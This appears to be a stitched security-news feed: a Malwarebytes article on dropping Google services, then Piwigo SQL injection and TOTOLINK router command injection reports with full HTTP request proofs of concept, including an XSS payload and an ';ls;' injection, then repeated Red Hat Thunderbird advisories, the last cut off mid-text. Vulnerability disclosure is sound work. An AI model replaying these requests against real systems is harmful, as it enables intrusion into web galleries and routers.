Google and all its products can dominate the average person's life. Here's an in-depth guide on how to remove yourself from their ecosystem.
The post How to remove Google from your life appeared first on Malwarebytes Labs.

Swearing off a company used to be easier. Rude customer service, an unfortunate bout of food poisoning, even standing up for workers’ rights against the alleged involvement of a private company to order a country’s military to brutally quash a strike—almost every facet of an individual boycott could be satisfied by simply refusing to purchase a company’s products.

But such a move can be far more difficult to accomplish today, especially when you’re trying to sever your relationship with an Internet conglomerate. Tired of Facebook? Be sure to jump off Instagram and WhatsApp, too, which are both owned by the social media giant. Over Amazon? Good luck trying to navigate the web without landing on at least one site hosted by Amazon Web Services.

And what about Google?

The online behemoth has become so much more than a search engine, as it owns and produces hardware like Android phones, Google Pixel phones, Nest thermostats, and FitBit devices, while also operating Google Chrome, Google Mail, Google Calendar, Google Hangouts, YouTube, and Waze.

Saying goodbye to Google, then, isn’t as easy as refusing to buy an Android phone. It means likely changing several aspects of your life, including some that will affect the people around you.

Thankfully, this daunting task has already been taken on by the cybersecurity evangelist Carey Parker, who spoke recently on the Lock and Code podcast from Malwarebytes. According to Parker, it isn’t that he wanted to remove Google because he “hates” its products—if anything, he’s a fan. Instead, he wanted to start supporting other companies that will respect him and his data privacy.

“Google knows so much about us,” Parker said, explaining that Google makes the overwhelming majority of its revenue from online advertising, which it can only do because of how much data it collects from its users. “For me, it was about limiting as best I could how much information Google knows about me, removing as much as I can for things they already know about me, and then wanting to support companies who put privacy first.”

For anyone who has wanted to take a similar plunge into a Google-less life, here are some of the tips that Parker shared with us.

****Start with the individual—Search, Chrome, and Android****

Getting rid of everything Google product all at once could be a disaster, as there are simply too many services and products to track. Instead, Parker began the first steps of his experiment by only removing the products that directly affected him.

“I started with the easiest things—at least I think the easiest things,” Parker said. “The ones that have maybe the least tendrils into other things. They don’t affect anybody but yourself.”

For Parker, that meant removing and finding new providers for Google Search and the web browser Google Chrome. When it comes to stepping away from Android devices, Parker found that easy—he’s been using iPhones for years.

In finding an alternative to Google Search, Parker offered two suggestions: DuckDuckGo and the search engine Startpage, both of which claim to refuse any user data tracking for revenue purposes. Instead, the companies say they serve purely contextual ads based on the searches themselves—like showing ads for Nike and Adidas for anyone looking for shoes—and they do not record or keep data on users’ specific searches. In fact, Parker said, Startpage actually works with Google to deliver search results, but the company tells users that it refuses to collect user IP addresses, device information, and browsing history.

“You don’t have to track people to make money,” Parker said, “and Startpage is proof of that.”

In looking for a different, privacy-focused browser, Parker suggested his personal choice, Mozilla’s Firefox, and also the up-and-coming browser Brave.

****Bigger shifts with Gmail and GCal****

Having found different solutions for searching and browsing the Internet, Parker said he then focused his attention on finding alternatives to Google services that impact those around him.

“\[Google Search and Google Chrome were\] the first tier, and then, the next one, which is harder—a lot harder, because it involves other people—are Google email and Google calendar, Gmail and Gcal,” Parker said, “I’ve got shared calendars with my family and I am not going to expect them to drop Google like I am trying to do, so for that reason, I’m going to be stuck there for a little while, but I can minimize it.”

After researching the many options out there, Parker found two email providers—one that fulfills much of Google’s functionality and integration with a calendar function, and another that provides end-to-end encryption on messages sent and received between users of the same program.

The first suggestion is Fastmail. Fastmail, Parker said, is a for-profit email provider that users pay to use through a monthly subscription. The email provider also has a calendar solution that works directly with its main product. Even better, Parker said, is that Fastmail respects its users’ data.

“\[Fastmail\] explicitly say they don’t mine your data, and they are privacy-focused even if they’re not end-to-end encrypted by default,” Parker said. “It’s a really great service and it has the full suite of email, calendar and contacts, among other things. I use it for all my business stuff and some personal stuff.”

For user who wish to prioritize security, Parker suggested ProtonMail, which, by default, provides end-to-end encryption for all emails sent between ProtonMail users. That means that even if your emails get intercepted by a third party along route, those emails cannot be read by anyone other than you and your intended recipient.

****More complexity with Google Drive and Google Docs****

For users who want to take even more data out of Google’s view, there are just a couple final products to remove from the daily workflow. Those are the cloud storage service Google Drive and the cloud-based word processor Google Docs.

For each product, Parker encountered headaches and obstacles, but he managed to find alternatives that both respected his privacy and provided similar feature sets and functionality.

In finding a proper cloud storage platform, Parker recognized that some of the major players, such as Box and Dropbox, did not provide meaningful encryption for users’ data that would prevent the companies from scanning and gleaning information from user files.

Parker offered several suggestions depending on what users want most. If a user wants to securely send a private file to someone else, he recommended the online services Swiss Transfer and Mega, which can give users the option to set certain parameters on how they share a file, including how long a shareable link is active and whether the file requires a password to access.

For pure storage options, Parker recommended the service Sync.com because of its client-side encryption. Many of the cloud storage providers today, Parker explained, will promise to keep your data secure, but they will also hold the decryption keys to anything that you store on their servers.

“Machines will review the files that you have stored on these drives, either for advertising purposes or, a lot of times it’s for copyright violations,” Parker said. “They’ll look and see—are you trading movies or music with other people? And they’ll flag that and give you grief.”

But after extensive research, Parker found that Sync.com actually provided users with a type of encryption that the company cannot work around.

“\[Sync.com is\] end-to-end encrypted,” Parker said, “meaning that, even if behind the scenes, Sync.com uses Amazon Web Services, Amazon can’t see what my files are.”

As to finding an alternative to Google Docs, Parker said he struggled a great deal, simply because Google Docs works so well. After first trying to adopt a solution that Parker said is “secure, it’s private, it’s end-to-end encrypted—as far as checking boxes, it checks them,” Parker grew disappointed with the solution’s interface and its sluggish response time. Then, a second option called OnlyOffice was, as Parker put it, “not for the faint of heart” because of a high technical bar which could require renting out cloud servers.

The best, most accessible alternative, then, Parker said, is Skiff, which has an easy-to-use interface, but which only has a replacement for Google Docs, and not for the other, related tools, like Google Spreadsheets or Google Slides. Skiff’s tool can be found at Skiff.org.

****Step by step****

Taking Google out of your life can be a long and complex process, but it doesn’t have to be hard at the very beginning. And remember, if you ever start to doubt what you’re doing, think about what made you want to start the process. If you’re anything like Parker, you’re motivated to keep your data private and out of the hands of a company that is making money off of you and your browsing habits.

“At the end of the day, we are in an age of surveillance capitalism,” Parker said, “and Google is a publicly traded company with a fiduciary responsibility to maximize profits for their shareholders. Absent privacy regulations in the United States, the financial incentives are just too great to ignore. That’s money off the table.”

Parker emphasized that until Google creates—and there’s no evidence this will happen—a version of its products that users can pay for with their own funds rather than with their own privacy, that users should assume that “at any moment, any Google product unfortunately can and probably will, somehow, monetize your data.”

As the saying goes, Parker said, “if the product is free, then you are probably the product.”

You can listen to our full conversation with Parker on the Lock and Code podcast below.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

How to remove Google from your life

SQL Injection vulnerability in admin/group_list.php in piwigo v2.9.5, via the group parameter to delete.

POST /admin.php?page=group\_list HTTP/1.1  
Host: 10.150.10.186:30001  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://10.150.10.186:30001/admin.php?page=group\_list  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 430  
Cookie: pwg\_display\_thumbnail=no\_display\_thumbnail; pwg\_id=hb609s43hqj1iqrkvlrvgne5q7  
Connection: close  
Upgrade-Insecure-Requests: 1

pwg\_token=036e74fc33b5eee65c74f44b98c09e13&group\_selection%5B%5D=1&selectAction=delete&rename\_1=1%3E%3Cscript%3Ealert%28%2Fgroup%2F%29%3C%2Fscript%3E&merge=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&confirm\_deletion=1&duplicate\_1=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&submit=%E6%87%89%E7%94%A8%E5%8B%95%E4%BD%9C

CVE-2020-19212: SQL injection in group_list.php · Issue #1009 · Piwigo/Piwigo

SQL Injection vulnerability in cat_move.php in piwigo v2.9.5, via the selection parameter to move_categories.

    POST /admin.php?page=cat_move HTTP/1.1
    Host: 10.150.10.186:30008
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30008/admin.php?page=cat_move
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 108
    Cookie: pwg_id=bv8q0gb8mbcqb99bhcqdlf1q20
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    selection%5B%5D=4&parent=7&submit=%E6%8F%90%E4%BA%A4

CVE-2020-19213: SQL injection in cat_move.php · Issue #1010 · Piwigo/Piwigo

SQL Injection vulnerability in admin/user_perm.php in piwigo v2.9.5, via the cat_false parameter to admin.php?page=user_perm.

    POST /admin.php?page=group_perm&group_id=1 HTTP/1.1
    Host: 10.150.10.186:30008
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30008/admin.php?page=group_perm&group_id=1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 33
    Cookie: pwg_id=tnnrng7j58gsgjms5hcdu2ge35
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    cat_false%5B%5D=11&trueify=%C2%AB
    

    POST /admin.php?page=user_perm&user_id=1 HTTP/1.1
    Host: 10.150.10.186:30008
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30008/admin.php?page=user_perm&user_id=1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 86
    Cookie: pwg_id=bv8q0gb8mbcqb99bhcqdlf1q20
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    cat_false%5B%5D=1&trueify=%C2%AB

CVE-2020-19215: SQL injection in user/group permissions manager · Issue #1011 · Piwigo/Piwigo

SQL Injection vulnerability in admin/batch_manager.php in piwigo v2.9.5, via the filter_category parameter to admin.php?page=batch_manager.

hi，There is a vulnerability in the admin/batch\_manager.php.  

I didn't find the full trigger request in the browser, so I added the ‘&filter\_category\_use=on’ parameter to the request based on the code.

    POST /admin.php?page=batch_manager HTTP/1.1
    Host: 10.150.10.186:30002
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30002/admin.php?page=batch_manager
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 695
    Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=85b6lvm6f6nqvji17k04ugkdu0
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    start=0&pwg_token=438d258aad10f5b13c74425475163e4e&filter_prefilter_use=on&filter_prefilter=last_import&filter_duplicate
    s_date=on&filter_category=1&tag_mode=AND&filter_level=03&filter_dimension_min_width=145&filter_dimension_max_width=2560&
    filter_dimension_min_height=91&filter_dimension_max_height=1440&filter_dimension_min_ratio=1.29&filter_dimension_max_rat
    io=1.77&filter_search_use=on&q=&filter_filesize_use=on&filter_category_use=on&filter_filesize_min=1.3&filter_filesize_ma
    x=1.3&submitFilter=&selectAction=-1&associate=1&dissociate=1&author=&title=&date_creation=2019-05-08+00%3A00%3A00&level=
    0&regenerateSuccess=0&regenerateError=0

CVE-2020-19217: SQL injection in admin/batch_manager.php · Issue #1012 · Piwigo/Piwigo

TOTOLINK N600R v5.3c.5507_B20171031 was discovered to contain a command injection vulnerability via the QUERY_STRING parameter in the "Main" function.

**TOTOLINK N600R V5.3c.5507\_B20171031 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as N600R V5.3c.5507\_B20171031
*   \*\*Firmware download address:\*\*https://www.totolink.net/data/upload/20200728/f984576c47289d782ed65e67edbf06e2.zip

**Description****1.Product Information:**

TOTOLINK N600R V5.3c.5507\_B20171031 router, the latest version of simulation overview：

**2\. Vulnerability details**

TOTOLINK N600R V5.3c.5507\_B20171031 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

We can see that the os will get  QUERY_STRING without filter splice to the string ;ps; and execute it. So, If we can control the QUERY_STRING, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?;ls; HTTP/1.1 
    Host: 192.168.0.1 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0

CVE-2022-27411: GitHub - ejdhssh/IOT_Vul

Red Hat Security Advisory 2022-1730-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.9.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:1730-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1730  
Issue date:        2022-05-05  
CVE Names:         CVE-2022-1520 CVE-2022-29909 CVE-2022-29911  
                   CVE-2022-29912 CVE-2022-29913 CVE-2022-29914  
                   CVE-2022-29916 CVE-2022-29917  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.9.0.

Security Fix(es):

* Mozilla: Bypassing permission prompt in nested browsing contexts  
(CVE-2022-29909)

* Mozilla: iframe Sandbox bypass (CVE-2022-29911)

* Mozilla: Fullscreen notification bypass using popups (CVE-2022-29914)

* Mozilla: Leaking browser history with CSS variables (CVE-2022-29916)

* Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
(CVE-2022-29917)

* Mozilla: Reader mode bypassed SameSite cookies (CVE-2022-29912)

* Mozilla: Speech Synthesis feature not properly disabled (CVE-2022-29913)

* Mozilla: Incorrect security status shown after viewing an attached email  
(CVE-2022-1520)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081468 - CVE-2022-29914 Mozilla: Fullscreen notification bypass using popups  
2081469 - CVE-2022-29909 Mozilla: Bypassing permission prompt in nested browsing contexts  
2081470 - CVE-2022-29916 Mozilla: Leaking browser history with CSS variables  
2081471 - CVE-2022-29911 Mozilla: iframe Sandbox bypass  
2081472 - CVE-2022-29912 Mozilla: Reader mode bypassed SameSite cookies  
2081473 - CVE-2022-29917 Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
2082037 - CVE-2022-1520 Mozilla: Incorrect security status shown after viewing an attached email  
2082038 - CVE-2022-29913 Mozilla: Speech Synthesis feature not properly disabled

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
thunderbird-91.9.0-3.el8_5.src.rpm

aarch64:  
thunderbird-91.9.0-3.el8_5.aarch64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_5.aarch64.rpm  
thunderbird-debugsource-91.9.0-3.el8_5.aarch64.rpm

ppc64le:  
thunderbird-91.9.0-3.el8_5.ppc64le.rpm  
thunderbird-debuginfo-91.9.0-3.el8_5.ppc64le.rpm  
thunderbird-debugsource-91.9.0-3.el8_5.ppc64le.rpm

s390x:  
thunderbird-91.9.0-3.el8_5.s390x.rpm  
thunderbird-debuginfo-91.9.0-3.el8_5.s390x.rpm  
thunderbird-debugsource-91.9.0-3.el8_5.s390x.rpm

x86_64:  
thunderbird-91.9.0-3.el8_5.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_5.x86_64.rpm  
thunderbird-debugsource-91.9.0-3.el8_5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1520  
https://access.redhat.com/security/cve/CVE-2022-29909  
https://access.redhat.com/security/cve/CVE-2022-29911  
https://access.redhat.com/security/cve/CVE-2022-29912  
https://access.redhat.com/security/cve/CVE-2022-29913  
https://access.redhat.com/security/cve/CVE-2022-29914  
https://access.redhat.com/security/cve/CVE-2022-29916  
https://access.redhat.com/security/cve/CVE-2022-29917  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYnQGstzjgjWX9erEAQjF4A//SunGEsCU1BiBRB3SU+W4qGeXzRz3NmNs  
sX55sJaXtYJ7efOg7kK8989v3VevTQCGDvwfuw48tQmlzCVz35zWTPhLeqjuiAn7  
DvHdez+4ci/ZRX9Argb1c2i9zU5bAon1PyRGEmP6uGcZztX2BYyo6Dkcg+Ow1D7g  
fa234gve8Q9pyKYvH4yN8DNOcNq8lm7B8a6vXr8+r/XFPWqBjGet0cH4N9wCRYDm  
VBrV692/8c3vW9u80EJbatpeaqEaYa1NteB7XDxERYCA+BoLal2v1wv7FN/nz0JJ  
9as8JmSDZRGu5S0aZlJIgNVSvxLDroBkfTcMjqJDqePpjf9ecF+XvXBgjtpyqVus  
bfbRpfRJArussaji8I+X6u2MvNoGtIyisjxz+rvhZ7V2Os6NWhAu7PFdUTcOop1J  
/WGL/3t4vK+YKwp3uDZwLZavU0DlGiBqhxtjlJV2/c+LZuSp1nxH0VxXrjAeUdQP  
zap+HhcCa6nEMkjnwW6DJfa1mTfbVvm0OhK7GnstA4s0z6nz+fbydz3eFxPY5WEs  
DHK6brQxWS37BdLOSzGjSrvuOWowq8eVsV6fCxp/VeUJJDH1XXOiD0g9kSndErTg  
iMgTimFBG0P0vRrMgO5MKztsuHIxWFGNfSWnNTErNdu8DlbudyQ5HaGY/owKQM0T  
Cg/vkuyfREA=KyQn  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1730-01

Red Hat Security Advisory 2022-1726-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.9.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:1726-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1726  
Issue date:        2022-05-05  
CVE Names:         CVE-2022-1520 CVE-2022-29909 CVE-2022-29911  
                   CVE-2022-29912 CVE-2022-29913 CVE-2022-29914  
                   CVE-2022-29916 CVE-2022-29917  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.9.0.

Security Fix(es):

* Mozilla: Bypassing permission prompt in nested browsing contexts  
(CVE-2022-29909)

* Mozilla: iframe Sandbox bypass (CVE-2022-29911)

* Mozilla: Fullscreen notification bypass using popups (CVE-2022-29914)

* Mozilla: Leaking browser history with CSS variables (CVE-2022-29916)

* Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
(CVE-2022-29917)

* Mozilla: Reader mode bypassed SameSite cookies (CVE-2022-29912)

* Mozilla: Speech Synthesis feature not properly disabled (CVE-2022-29913)

* Mozilla: Incorrect security status shown after viewing an attached email  
(CVE-2022-1520)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081468 - CVE-2022-29914 Mozilla: Fullscreen notification bypass using popups  
2081469 - CVE-2022-29909 Mozilla: Bypassing permission prompt in nested browsing contexts  
2081470 - CVE-2022-29916 Mozilla: Leaking browser history with CSS variables  
2081471 - CVE-2022-29911 Mozilla: iframe Sandbox bypass  
2081472 - CVE-2022-29912 Mozilla: Reader mode bypassed SameSite cookies  
2081473 - CVE-2022-29917 Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
2082037 - CVE-2022-1520 Mozilla: Incorrect security status shown after viewing an attached email  
2082038 - CVE-2022-29913 Mozilla: Speech Synthesis feature not properly disabled

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
thunderbird-91.9.0-3.el8_4.src.rpm

aarch64:  
thunderbird-91.9.0-3.el8_4.aarch64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_4.aarch64.rpm  
thunderbird-debugsource-91.9.0-3.el8_4.aarch64.rpm

ppc64le:  
thunderbird-91.9.0-3.el8_4.ppc64le.rpm  
thunderbird-debuginfo-91.9.0-3.el8_4.ppc64le.rpm  
thunderbird-debugsource-91.9.0-3.el8_4.ppc64le.rpm

s390x:  
thunderbird-91.9.0-3.el8_4.s390x.rpm  
thunderbird-debuginfo-91.9.0-3.el8_4.s390x.rpm  
thunderbird-debugsource-91.9.0-3.el8_4.s390x.rpm

x86_64:  
thunderbird-91.9.0-3.el8_4.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_4.x86_64.rpm  
thunderbird-debugsource-91.9.0-3.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1520  
https://access.redhat.com/security/cve/CVE-2022-29909  
https://access.redhat.com/security/cve/CVE-2022-29911  
https://access.redhat.com/security/cve/CVE-2022-29912  
https://access.redhat.com/security/cve/CVE-2022-29913  
https://access.redhat.com/security/cve/CVE-2022-29914  
https://access.redhat.com/security/cve/CVE-2022-29916  
https://access.redhat.com/security/cve/CVE-2022-29917  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYnQGxtzjgjWX9erEAQhAoA/+Il0KSJzRzn19uKI7t5uynpXJbyNali6Q  
/oOq27+JD2wOFJVIHhzns3zf+M4EtbncZGmn+KLgv/GeoTJYwp56yaZzB6Va+TC3  
cZ75fQRmZ23WEyXUW7ovxAP1zsAASEck8tm4Op6NIi/yVNZvn61WIQSOBuRSfZZV  
br79+22s9sEM9vCAlYc6d1OXdyvAC/4qBtvkSaixo0DeBs2khyvXa6OjhThYk4JX  
UvXKNVP/KFFApTkZCQh58pMLoExbQiVBpSTlXekyEzA97qXs5egUfxTc3DY1lTB/  
RxmPFLBD1KyXQ71umQWJDSOoBMpIKmuJd9O03fZFR5Yn3OGwpdk300O39HKkb3Ph  
4wq+Cab60poUxSwn+8yKPqL9Ia1z5nOaiRx29tZjQinWJr3wg5xIRpVpSpp5Iw0u  
deX86ZFgfCPb1C9kjzSdmIuRA22oIG7aB6Dwg0DRUxo/ZgB9Bao01ShDz5O38qfi  
bcw12NBlslc/JCwBYTsq6cRGCfJPOI1D6sUjqVUveCMrJWciQ6u1UtMd6mQadd+I  
KOJVDwbceaMScllqf+UukXZk63T9EzWIut8ce9uuvenELlNqPEJ9Fl35Q8LYtjYf  
nuMrnCOjS6rQIWbeEIlAl6llMOdclzOEMAuoqTWZe55gvctECxAbbDvklsokph83  
tCwNRqx20JY=L5Iv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1726-01

Red Hat Security Advisory 2022-1727-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.9.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:1727-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1727  
Issue date:        2022-05-05  
CVE Names:         CVE-2022-1520 CVE-2022-29909 CVE-2022-29911  
                   CVE-2022-29912 CVE-2022-29913 CVE-2022-29914  
                   CVE-2022-29916 CVE-2022-29917  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.9.0.

Security Fix(es):

* Mozilla: Bypassing permission prompt in nested browsing contexts  
(CVE-2022-29909)

* Mozilla: iframe Sandbox bypass (CVE-2022-29911)

* Mozilla: Fullscreen notification bypass using popups (CVE-2022-29914)

* Mozilla: Leaking browser history with CSS variables (CVE-2022-29916)

* Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
(CVE-2022-29917)

* Mozilla: Reader mode bypassed SameSite cookies (CVE-2022-29912)

* Mozilla: Speech Synthesis feature not properly disabled (CVE-2022-29913)

* Mozilla: Incorrect security status shown after viewing an attached email  
(CVE-2022-1520)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081468 - CVE-2022-29914 Mozilla: Fullscreen notification bypass using popups  
2081469 - CVE-2022-29909 Mozilla: Bypassing permission prompt in nested browsing contexts  
2081470 - CVE-2022-29916 Mozilla: Leaking browser history with CSS variables  
2081471 - CVE-2022-29911 Mozilla: iframe Sandbox bypass  
2081472 - CVE-2022-29912 Mozilla: Reader mode bypassed SameSite cookies  
2081473 - CVE-2022-29917 Mozilla: Memory safety bugs fixed in Firefox 100 and Firefox ESR 91.9  
2082037 - CVE-2022-1520 Mozilla: Incorrect security status shown after viewing an attached email  
2082038 - CVE-2022-29913 Mozilla: Speech Synthesis feature not properly disabled

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-91.9.0-3.el8_1.src.rpm

ppc64le:  
thunderbird-91.9.0-3.el8_1.ppc64le.rpm  
thunderbird-debuginfo-91.9.0-3.el8_1.ppc64le.rpm  
thunderbird-debugsource-91.9.0-3.el8_1.ppc64le.rpm

x86_64:  
thunderbird-91.9.0-3.el8_1.x86_64.rpm  
thunderbird-debuginfo-91.9.0-3.el8_1.x86_64.rpm  
thunderbird-debugsource-91.9.0-3.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1520  
https://access.redhat.com/security/cve/CVE-2022-29909  
https://access.redhat.com/security/cve/CVE-2022-29911  
https://access.redhat.com/security/cve/CVE-2022-29912  
https://access.redhat.com/security/cve/CVE-2022-29913  
https://access.redhat.com/security/cve/CVE-2022-29914  
https://access.redhat.com/security/cve/CVE-2022-29916  
https://access.redhat.com/security/cve/CVE-2022-29917  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

